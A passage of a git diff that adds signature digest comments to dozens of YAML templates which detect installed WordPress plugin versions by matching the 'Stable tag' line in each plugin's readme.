4a0a00473045022005fc857171f9e83bead934205ceb194f0346201fb43489450b32196de80902d80221009fa08450aa917b2a5c1c2a1be4749a3bba3a5217ef4f42ede02a3ab6cf01a9b5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml index 39d269fb856..4dc7a372889 100644 --- a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202a555eadbdb8d5a25106dc22f90308173ada2ff6eb8d0d0d21f0c2747a5dfaff02207a97c5f74c2851bb9e4a3821782bce01d5bde1cac3dfd2ff415ad53a872bd52d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index fc126d83c63..5ca8a638442 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100acdfadc2f5f7c97fa024ecff42de444897f2d0487afa82123f3635d393dcda71022100a708d1114100df26cbb8793878b2f6ea3a731855026d867df835fdf2837c7a98:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index 8c49a342590..0aa33d5493f 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220086b0e66fc182a06bda67273362670980072addce444e44476be5b039db2cada02206a386a9b33bb5db4427cf2213cff4e80479f97e29c74cb63e9353c01e10362ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index 6ac2212b4be..be78beb97ad 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e681cf1524b0e794b31235614d9403f3fa4f6c45cc0f04f69b3348ee838794dc022100b73da47a272449a3399f283a062aa9950939279722fdf59d0715d06e19c8f562:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index 71c71b5ed14..227e9dc4ff4 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d6facfa239f7275df14040cd535d3b65a525d5ec32e67fcbfd27c84a0f863fd8022100fa9d8552f49c41de715152f988cf79437ab9a2934bad7309220d306538e64bac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 7b47adc274b..118c2a3980e 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201b48cda2b471dc7ca1c0cad7faaa778341356043bb23ee1eb9abfa73f0a8677102204c1c15d828ef92db7c640543da97cb952668e2974e3206685d3ecce294419d66:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/templately.yaml b/http/technologies/wordpress/plugins/templately.yaml index 286dfdaec66..cb088b34b99 100644 --- a/http/technologies/wordpress/plugins/templately.yaml +++ b/http/technologies/wordpress/plugins/templately.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022062f4a31a34869d15ba99462a93b9ed396e8d910b793cd344d37f53d923673da202207a4a5aa3d6b1816985af74e3b4bb83b34ad0a5adc1de357263177ac85451a3db:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index c4928059f6c..4bbbcc3cc19 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221008be7ec1f76ec8b9789b553c8095d969f669fa380fefe00f436109740e7892278022032af71904b947381e5ad50e3b6e2a9a96ec0b22abf4aee5a978299ba6f598a31:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index f6a7836f35a..5d78628266e 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210080847aadf823df098e23cc9853a34c91a3d1c51963ecb8755be5386ec4803e2402207d29fb536a5ace29764dc6ac1bf4c59a4a7700ebc2f71033f49a97b46e37a814:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index b7af708c4fa..0f12f27e58c 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e08b129aa58fdecc90ca23da6fd1d3f2e0243dd53ac8633bfd622f29d4c68fe10221009bc5a18f48cc9ffcbf09fbbc94b8132dcddc26ee3b123ca6aa4e0259a97ad893:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 61a793edf72..7d50c88bfa2 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210085e35ab4c794304a1e507f4829630ad5297f8acc62b9b374272ebbb2c5b1586f022100ae88b108b5bafdd7efcbb701546930418ec3a40a7cd7ceb3c792f156c12441a7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index 0da88d5d3f7..2b5782ef180 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f5a9b667e87a5982da681ef99e11b45027fa6136b778d2f11a79edff7d445856022100d3e6f676060dd1f01caa899145aa91d08988fb282690b3ac9f0055ce8b603d69:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index 2b29428cf10..20e35fa5c35 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202539f2289af9fe0a83e3c377e79a908fed78a3bc5362ef01a812e75541deb97d022100bd06b3ead68ea556ad4b3c3e8630c56c055ff2c45cb960d01dfdf57587b14b7b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index 181e619a7cf..abd84d29976 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022044fedcf9e079b6c40ce3ef02fec84bea191aee863c0b40e96ae312f8f53d29a502200413e86e46b90add5a5d2b71e5ff2420e781e04622fb734c562abbc8a1af061d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 8164eb44838..81b0e46bd6b 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e24596f995d1306d64cd499a62bf177d9893c06398108855a91cc3342975e7c6022049b9faf49b898c250b5d70085a4472f672000f404fdff28daecdb326128d2256:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 59554defdfc..324d2d5ace0 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ac84299f69147522c38339820e9e29f60308481580168ddba38078e961f88ebb0221008776197130f6c6e892849503f5451c727835eb2a350e3f3464ac847f1b206e28:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index 350fd9436b4..34cbfd4483d 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022061a0e33b086ee97fb49c32c4fc5d756f07f933b917f2a3da158904b30a2ff1d7022100ba5a347ab487e136f67b8504558790da6f89d03d2223856264617d428f68c98a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index 2ae6bafbbab..accfb833a6d 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210087e24cbcf18e89b6af720cd3b029309878e790b255ce9e888ae2f0ab07b4d2d30220402bb4058a6d7389fc92c3616e1f446ed44bb47ae9c9cdf6d2286bf4dc68c03b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index d0dc8d92bb9..efe627f010f 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ec0d8c3bbb72f2a6eb6916863bb3e6dd5f3f100dde1e9916c29affd8b93275fb02207bb77aaae343e3f1a5a9ef6d82a6e265cccb980aedc9c8049a89c4a304917af9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index c49bbc2b6d1..9813e8fc85f 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a4591db17c514057b4363d7a49272003b791ab3fe0788bd32b2a31ac7b00e8d90220443e39e7abbca6292d38b1efc5064c83bde4e7d781e82ea8d9300a4f9679e9a7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 27586cbd9d1..6c1b11362f2 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022052585b19c9d0ae752c34a3a45dc626cdb1abced44c07301e2f7c690743dabbff0220311a0dabfcd676b8500795f2a2060befd4e0d64db46479c1ea928f320b46b850:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index 946272f0a90..4697065c8ef 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200c80d7372c8ee6fd4616cacbd82b26f27ec60430540fa126a0e78e6520bfe869022100dc59690343bfee07cfc9970d3fbbd845468d72723fc7db44096219a427a2dfd6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml index aa297068720..97a6c05da03 100644 --- a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402204c5fd859323cde775efba79f1d6b0ebd39db0fd2bd3ccf26efb91a49e3cf4eec0220232243bfb2a8019bb410074972d11b94f52bea8fb442391cb934806b58e1e31a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index 290d53ab7ed..df0029c643f 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b11201d71adc714b3408c1fcf2393b820890551a3dab02928f2b4a1fd48e1fb702200688a5d234918e88ac35938c17fd1ab346c3346f4ff86e52e7fe397ab1f044b4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index f7c9ef9b1f8..2fe6da2460a 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220015b9bc1d9aa1f7e6a2c2435fa42ce9ad8c6b0f17db2b4e93c12023cafe49038022100b952999d54750c51053798fb98c94e4b99e91d0b2a44cb28d14f4e9f455f6b45:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index f1c16275a2a..926c81f522e 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022071f0c94eb3f66e5d459aaf967887969c2e4e9768f1eb4703bc9d502e522c0f560220753af9b673aeab762f844909dd5cfacf038b160a4a0e7ec8eaf522670a78bcbe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index fc072e19d8a..4e6a953933a 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b800b58fba149cc7889140df2dad6a16444e09fdd8f6c90bae5f39f4a1705d1502201e79b5d1564929bd78518d75fd719aed3864b09aa939e5ef90c17b72a8791dde:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index da9df0e8a5c..e3c1312ee0d 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c396273006c1727daf6fc25f1e2bb9e356b8327b4bd0f2b76d5c78c1097d3202022100f9cddbc708db9d93a15b2be8b73ee183246e8f43c40e8ee653f72fa2ab2cfbe1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index f8113d97506..a0191365264 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f704170965f6d0325eb87ed658ebf30de95dd2fcba734dfd3a45192c17cc0dd902203c302113d402051b2a5e552ed70558e06f724a40232cb445519305fb86bec6d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index 5f80282ab22..ac7d085b603 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a5418b4312a0a17ffb4664d0a85f17e50bea694421ce2dddaa075abadf09453d022100e5134610e77f75c55f432baa0ee32d1667c42af02a2c0e0f7f4ebbf340f68790:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 5725d5bb3f8..8709e1fa2db 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207a2a5e942a94d3afd7d232aa78f378d50e7d6b28ac83786838df09a753ecfbf5022100f74a2bcf2a62047126cff63faea13b658165b781fec52accef2aebb9e4f0e34a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index f67a8bc18a8..94193cdfa2e 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402205826979e3c2660e146d7da9e4e5a9454112f73761462f34b30361209b79e063d022067c72139fa3e1a306bf7a297c3ac8b757af4368ce42b92dad85daac44674a5ef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-crontrol.yaml b/http/technologies/wordpress/plugins/wp-crontrol.yaml index a773829b7d8..9acd0883a73 100644 --- a/http/technologies/wordpress/plugins/wp-crontrol.yaml +++ b/http/technologies/wordpress/plugins/wp-crontrol.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402204965e163701b859e8fc665538342f20d726096c384185c085fa4bbacd7d742e002203a7816ceee938f6b3ba2c99adcef5a82bb7b4ab362c307cc575e258e1bc55e20:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index b9bd4be0a8b..68e6dae4ba9 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201492a1b146d37f2c1997610da5886bf3416d654d7b6435219e2dacc0f139c17a02201911d4819e4d892aae0034b208d366e050b27530324704b116b61b79c8a2b0fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index bece4ce486a..48acec7113e 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100bc8252603de333c2a1452933e73f093bbc1120ee4614c6ba1e2b4039bde5a434022042ea990cda51853ebbd8c1bd7e0fb6de2c4160cf2324ea29fa89a18deeec9dad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index 138b0aa9a69..298945caff6 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009e158ca51fc7207b3297bf512293e74a59da59c3ac005e667d27e231cb99d67b0220505be73cbc6fd49d0e4c29129b9b67f8b3ee8898bd368669581aef857c61d0c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 68bf71bc839..33fff84212b 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206daedd37788fc76eb604e91a9723d3ab37c1ef7d47790e1c0b00e1366dbea5b7022100b40f79e3d1737d21b2b6b5c30c241c251e730d13b1409d40e3675eee159a4b16:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index 10dad2d2fb8..238fceb248c 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100cc91dcd3a10d2f06fd1677914ce9288c30686fbca9e25ff32f6a6da864f8e40c022100a1dfc7cb2826be0e259925b70e82bfc6cf908c1b6b608dab53843b4470df6ba1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index e9efe6fb53a..7aa56463534 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220772657ef74d41a314b4ae33a117ff5c8e7943915f74755063426edf0aa5a733c02206dfa427babd6df321bbe87f489ba1560942f5a74487503e70f991f1d2340465a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index c3d10f01359..ce6423ff19b 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d0351be43b5208974434bf157ce5457246be0a820d39c59d4e431203a492c1f40221009150416600617bef0499b49931188517844a2ebd06b6c074266a6fe34eb170af:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index 4a8bc6b75c7..6b35d35c7e4 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210089053add319adb71976f8cf106f0999c137d9d64c34f4844b380bef41427b55302210083b0fff3f04d764f0fe8c0c9f06e99d79d02756f6d6f458fe13e9b4d15bdd555:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index d2c74355bd7..200c713615d 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220458a24270e4c7930bc7f6a634923d1201263ec4253ed3c79d73d3bfa3fa5268202205a64d410deb259e4a03033890534277b6d83c2f3da3dd0d8646a6548cc76d03c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index 94b8494b08d..2f409c854aa 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009977e2d070496bb79ceb714b3a79fc9982a07cde6e4a523bbf14268ce2484796022005d3f2903c92d68934658c6d347057ccb10b01d1db857e4ca26d47c3188fe64e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index 108aba79e99..8898760b54c 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100bb764a3ac2acacdbcf9ae34ecd48849df62e40d07dc60aa3cca758ddf3aab8a5022100c1138aa7a8e46131df8a3ae1f41105df1e8d6af93692fca3f4bdfa0060e67352:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index f6f6bf55667..28eb3cb4dc1 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210090c90142ceee8dd908da4b217814a8b0888de2a271058b28e107dc71174d10460220610eaa6a183ec74c1fe7ae10b88a246e3489ab6acb404518541d1e465882cf85:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml index 483cb7cac74..f30a61833d4 100644 --- a/http/technologies/wordpress/plugins/wp-seopress.yaml +++ b/http/technologies/wordpress/plugins/wp-seopress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 